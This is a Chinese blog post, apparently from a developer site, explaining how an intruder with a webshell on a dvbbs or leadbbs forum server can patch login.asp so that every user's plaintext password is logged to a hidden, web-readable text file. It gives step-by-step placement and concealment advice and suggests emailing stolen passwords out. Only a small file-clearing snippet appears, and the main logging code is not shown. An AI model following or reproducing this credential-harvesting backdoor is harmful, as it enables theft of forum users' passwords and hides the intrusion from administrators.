用asp记录论坛用户密码(dvbbs,leadbbs等)

博客介绍了用ASP记录明文密码的方法,将代码插入验证登陆文件末尾,替换路径,确保webshell有权限修改文件且FileSystemObject可用,一段时间后可在IE上查看登录用户的帐号密码,还提及了添加功能、清空文件等注意事项。
 

很多人在得到动网数据库后郁闷不已
(呀的,管理员的变态密码让我们的机器跑砸了都没辙)
Now We Have Another Method!!!!!
这就是用asp记录明文密码。


用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可。
2.将PATH换成web下可访问的路径,如:C:/Inetpub/wwwroot/.../Info.txt(info.txt的路径越深越好,防止admin发现)
3.你的webshell必须有权限修改文件且FileSystemObject可用。
4.一段时间后在IE上访问:http://.../Info.txt就 可以看到登录过的用户的帐号密码。
5.在IE上输http://.../(which your modified).asp?u=del可一清楚info.txt的内容。

注意:1.你可以为它添加其他功能,例如:已记录的用户不再重复记录,用邮件接收密码等等。
2.为了防止info.txt过大,我用清空info.txt的方法。
当然你可以新建文件来解决此问题。
if filesize>200000 then
set file2=fso.OpenTextFile(PATH,2,True)
file2.WriteLine ""
file2.close
end if

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值